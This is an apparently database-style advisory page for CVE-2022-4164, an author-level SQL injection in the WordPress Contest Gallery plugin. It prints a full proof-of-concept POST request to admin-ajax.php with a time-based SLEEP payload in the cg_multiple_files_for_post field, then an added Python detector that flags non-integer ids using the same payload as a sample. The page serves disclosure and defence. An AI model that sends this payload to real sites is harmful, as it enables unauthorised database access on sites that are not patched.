Contest Gallery < 19.1.5 - Author+ SQL Injection

Published: 05 Dec 2022 00:00:00
Reported by: Daniel Krohmer
Type: wpexploit

Contest Gallery SQL Injection via POST request

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| WPVulnDB | Contest Gallery < 19.1.5 - Author+ SQL Injection | 5 Dec 2022 00:00 | wpvulndb |
| Prion | Cross site request forgery (csrf) | 26 Dec 2022 13:15 | prion |
| Cvelist | CVE-2022-4164 Contest Gallery < 19.1.5 - Author+ SQL Injection | 26 Dec 2022 12:28 | cvelist |
| NVD | CVE-2022-4164 | 26 Dec 2022 13:15 | nvd |
| CVE | CVE-2022-4164 | 26 Dec 2022 13:15 | cve |

Code

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------284630601713051351302083313615
Content-Length: 2082
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668392508; wp-settings-5=libraryContent%3Dupload
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryHash"

355b5e0384230f74e41bc47f47d94aef
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_id"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_star

-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_multiple_files_for_post[1]"

[{"id":"' ELSE MultipleFiles END WHERE (id) IN ((1)) and SLEEP(5);#"}]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_step"

10
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_order"

custom
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_search"


-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_email[1]"

[email protected]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_image_name[1]"

10x-featured-social-media-image-size
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="chooseAction1"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgIsRealFormSubmit"

true
-----------------------------284630601713051351302083313615--
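
A defender-side check for the field that carries the injected value in the request above, as an added example that is not part of the original advisory or the plugin's code: it parses a captured multipart/form-data body and flags any `cg_multiple_files_for_post[...]` entry whose `id` is not a plain integer. The integer-only rule, the function names and the sample body are assumptions constructed for illustration.

```python
import json
import re
from email.parser import BytesParser
from email.policy import default

# Field name as it appears in the request above; the bracketed index varies.
FIELD = re.compile(r"cg_multiple_files_for_post\[[0-9]+\]")
# Assumption (not stated on the page): a legitimate "id" is a decimal integer.
INT_ID = re.compile(r"[0-9]+")


def suspicious_ids(content_type, body):
    """Return (field, value) pairs whose "id" is not a plain integer."""
    # Prepend the Content-Type header so the MIME parser knows the boundary.
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser(policy=default).parsebytes(raw)
    hits = []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if not isinstance(name, str) or not FIELD.fullmatch(name):
            continue
        text = part.get_content().strip()
        try:
            entries = json.loads(text)
        except json.JSONDecodeError:
            hits.append((name, text))  # malformed JSON is flagged as well
            continue
        for entry in entries if isinstance(entries, list) else [entries]:
            value = entry.get("id", "") if isinstance(entry, dict) else entry
            if not INT_ID.fullmatch(str(value)):
                hits.append((name, str(value)))
    return hits


def _part(name, value):
    # Build one form-data part for the constructed sample below.
    return (f'--SAMPLE\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n").encode()


# Constructed sample body: one benign field, one with the value from the request above.
PAGE_VALUE = "' ELSE MultipleFiles END WHERE (id) IN ((1)) and SLEEP(5);#"
SAMPLE_TYPE = "multipart/form-data; boundary=SAMPLE"
SAMPLE_BODY = (_part("cg_multiple_files_for_post[1]", json.dumps([{"id": "12"}]))
               + _part("cg_multiple_files_for_post[2]", json.dumps([{"id": PAGE_VALUE}]))
               + _part("cg_order", "custom")
               + b"--SAMPLE--\r\n")

if __name__ == "__main__":
    for field, value in suspicious_ids(SAMPLE_TYPE, SAMPLE_BODY):
        print(f"non-integer id in {field}: {value!r}")
```

The check needs request bodies, which web servers do not log by default, so it fits a WAF rule, reverse proxy hook or captured-traffic review.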

Vulners AI Score: 0.1 (Low risk)
EPSS: 0.001